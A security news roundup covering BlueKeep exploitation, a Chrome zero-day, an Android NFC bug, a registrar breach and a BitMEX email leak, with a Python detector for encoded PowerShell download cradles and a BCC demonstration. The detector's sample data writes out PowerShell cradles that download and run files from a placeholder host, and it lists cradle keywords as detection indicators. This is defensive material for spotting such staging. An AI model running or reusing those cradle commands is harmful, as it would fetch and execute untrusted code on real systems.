Windows BlueKeep RDP Attacks Begin
BlueKeep is a wormable remote code execution (RCE) vulnerability in the Remote Desktop Protocol (RDP) service of several Windows operating systems (XP, 2003, 7, Server 2008, and Windows Server 2008 R2). Exploiting it allows an “unauthenticated attacker to run arbitrary code remotely, launch denial of service attacks, and, in some cases, take full control of unpatched systems.”
The vulnerability is now being exploited in the wild: security researcher Kevin Beaumont noticed multiple attacks against his EternalPot RDP honeypots. In the last week, the honeypots went through cycles of crashes and reboots for the first time in the half-year they have been running.
Marcus Hutchins (AKA MalwareTech) investigated the crash dumps from Beaumont’s machines and “found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.”
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner.
According to Hutchins’s analysis, the initial payload runs an encoded PowerShell command, which downloads a second encoded PowerShell script. The final payload includes a cryptocurrency miner, which has a 25 out of 68 detection rate on VirusTotal.
Thankfully, the individual behind these attacks seems to be using public resources and did not develop a wormable threat, which could cause significant security concerns for many.
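The staging described above (an encoded PowerShell command that fetches a second encoded script) is something a defender can look for in process-creation logs. The following is an added example, not code from the article or from the researchers it cites: it pulls the Base64 blob after `-EncodedCommand` (or any of its abbreviations), decodes it as UTF-16LE the way PowerShell does, follows one level of nested `FromBase64String` unpacking, and flags download-cradle indicators. The log lines, URLs and paths are constructed placeholders.

```python
import base64
import re
from typing import List, Optional

# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc, ...) followed by a
# Base64 blob. PowerShell takes any unambiguous prefix of the switch name.
ENC_SWITCH = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A second stage that unpacks another Base64 string inside the decoded script.
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
# Strings that commonly appear in download cradles and staged payloads.
INDICATORS = ["DownloadString", "DownloadFile", "Invoke-WebRequest", "Net.WebClient",
              "IEX", "Invoke-Expression", "FromBase64String"]


def _best_decode(raw: bytes) -> str:
    """Decode as UTF-16LE when the bytes look like it (every odd byte is NUL), else UTF-8."""
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand is always Base64 over UTF-16LE; return None if the blob is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> Optional[dict]:
    """Return decoded layers and matched indicators, or None if there is no encoded command."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    decoded = decode_encoded_command(m.group(1))
    if decoded is None:
        return None
    layers = [decoded]
    for inner in NESTED_B64.findall(decoded):  # follow one level of nesting
        try:
            layers.append(_best_decode(base64.b64decode(inner, validate=True)))
        except ValueError:
            pass
    text = "\n".join(layers).lower()  # search only decoded script text, not the Base64 itself
    hits = [i for i in INDICATORS if i.lower() in text]
    return {"decoded": decoded, "layers": layers, "indicators": hits, "suspicious": bool(hits)}


def scan_log(lines: List[str]) -> List[dict]:
    """Scan Windows 4688-style lines with a CommandLine="..." field; return suspicious findings."""
    findings = []
    for line in lines:
        m = re.search(r'CommandLine="([^"]*)"', line)
        if not m:
            continue
        result = analyze_command_line(m.group(1))
        if result and result["suspicious"]:
            findings.append({"line": line, **result})
    return findings


def _ps_encode(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample data (placeholder hosts and paths, not real indicators).
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')"
STAGE2_INNER = "(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/m.exe','C:\\placeholder\\m.exe')"
STAGE2 = "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('%s')))" % (
    base64.b64encode(STAGE2_INNER.encode("utf-8")).decode("ascii"))
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOGS = [
    'EventID=4688 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe readme.txt"',
    'EventID=4688 Image=%s CommandLine="powershell.exe -nop -w hidden -enc %s"' % (PS, _ps_encode(STAGE1)),
    'EventID=4688 Image=%s CommandLine="powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s"'
    % (PS, _ps_encode(STAGE2)),
    'EventID=4688 Image=%s CommandLine="powershell -enc AAAAAAAAAAAAAAAAAAAA"' % PS,  # not valid UTF-16LE
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        print("indicators:", f["indicators"])
        for layer in f["layers"]:
            print("   ", layer)
```

The decoder deliberately reports only on what is inside the decoded script, never on the Base64 text itself, so a random run of letters in a blob cannot trigger an indicator. Note that `-ExecutionPolicy Bypass` also starts with `-e`; the length floor on the blob keeps it from being mistaken for an encoded command.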
Google Discloses Wild Chrome Flaw
Over the weekend, Google disclosed a high-severity vulnerability that malicious actors are actively exploiting to hijack computers. Kaspersky security researchers Anton Ivanov and Alexey Kulaev discovered the flaw, CVE-2019-13720, which exists in Google Chrome’s audio element. The vulnerability allows an attacker to take control of an affected system.
CVE-2019-13720 is a “use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed.” The bug could cause a variety of issues, such as crashing the program, allowing an attacker to execute arbitrary code, or enabling full remote code execution capabilities.
In the wild, attackers have delivered this exploit through a “waterhole-style injection” on a Korean news portal. The researchers have named the campaign Operation WizardOpium and urge users to update to the latest version of Chrome, 78.0.3904.87.
Android Bug Lets Hackers Plant Malware via NFC Beaming
Last month, Google patched an Android bug that could have allowed hackers to spread malware to phones near them using NFC beaming.
NFC beaming uses an internal Android OS service called Android Beam. This service sends various kinds of data, including videos, apps, and files, to nearby devices over NFC. Normally, the receiving user gets a notification asking them to allow the NFC service to install the app or transfer the data.
However, security researcher Y. Shafranovich discovered that when apps are sent via NFC beaming on Android 8 (Oreo) or later, no notification is shown on the receiving device. This vulnerability, CVE-2019-2114, could allow a nearby malicious actor to plant a malicious app on a victim’s phone. The vulnerability stems from Android Beam being whitelisted within the Android operating system; that whitelist entry has now been removed.
To stay safe, you can disable both the NFC feature and Android Beam Service on your phone.
Leading Web Domain Name Registrars Disclose Data Breach
Many of the world’s top domain name registration websites such as Web.com, Network Solutions, and Register.com, recently disclosed a security breach that may have impacted customers’ account information.
In August 2019, a malicious actor gained unauthorized access to some of the companies’ computer systems and accessed millions of accounts owned by the web domain name registrars.
The breached information includes:
Information about the services offered to a customer
Because much of the stolen information includes personal identifying information, affected customers should be wary of potential targeted phishing emails. These emails attempt to steal a victim’s passwords or credit card information by impersonating a trusted entity.
BitMEX Twitter ‘Hacked’ as Identities Are Leaked and Bitcoins Are Reportedly Stolen
Over the weekend, BitMEX seems to have experienced a strange series of events. Their official Twitter account appeared compromised when the official handle tweeted “Hacked” and “Take Your BTC and run. Last day for withdrawals.” These tweets were quickly deleted, however.
In the past few days, the company also suffered a particularly embarrassing email blunder. While sending a mass email to its customer base, BitMEX put the recipients in a visible address field instead of using blind carbon copy (BCC), exposing the entire email address list to everyone who received the message.
While the leak does not expose highly sensitive information, it does give malicious actors publicly identifiable information for more targeted phishing attacks. Some individuals have reported on Twitter that their accounts have been accessed as a result of this mistake.
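The mechanism behind a BCC blunder is that recipient addresses placed in the To or Cc header are delivered to every recipient, whereas addresses supplied only in the SMTP envelope are not. The following is an added example, not code from the article or from BitMEX: it builds the mistaken message beside the corrected one and checks which customer addresses would be visible to a recipient. The sender, recipients and text are constructed placeholders.

```python
from email.message import EmailMessage
from typing import List, Tuple


def build_bulk_message_wrong(sender: str, recipients: List[str], subject: str, body: str) -> EmailMessage:
    """The mistake: every customer address lands in a header that all recipients can read."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = ", ".join(recipients)
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def build_bulk_message(sender: str, recipients: List[str], subject: str, body: str) -> Tuple[EmailMessage, List[str]]:
    """The fix: headers show only the sender and an empty group address; the real
    recipient list is returned separately to be used as the SMTP envelope."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "undisclosed-recipients:;"  # RFC 5322 empty group, reveals nobody
    msg["Subject"] = subject
    msg.set_content(body)
    return msg, list(recipients)


def leaked_addresses(msg: EmailMessage, recipients: List[str]) -> List[str]:
    """Return the customer addresses a recipient of this message would be able to see."""
    visible = " ".join(str(msg.get(h, "")) for h in ("To", "Cc"))
    return [r for r in recipients if r in visible]


# Constructed placeholder data.
SENDER = "news@example.invalid"
CUSTOMERS = ["alice@example.invalid", "bob@example.invalid", "carol@example.invalid"]

if __name__ == "__main__":
    bad = build_bulk_message_wrong(SENDER, CUSTOMERS, "Update", "Hello")
    good, envelope = build_bulk_message(SENDER, CUSTOMERS, "Update", "Hello")
    print("leaked by the mistaken message:", leaked_addresses(bad, CUSTOMERS))
    print("leaked by the corrected message:", leaked_addresses(good, CUSTOMERS))
    # Sending would look like (assumed SMTP host, not run here):
    #   with smtplib.SMTP("smtp.example.invalid") as s:
    #       s.send_message(good, from_addr=SENDER, to_addrs=envelope)
```

A related trap: if you instead put the list in a `Bcc` header, `smtplib.SMTP.send_message` strips that header before transmission, but the lower-level `sendmail(msg.as_string())` path sends the message bytes exactly as given, Bcc included. Passing the list only as `to_addrs` avoids depending on that behaviour.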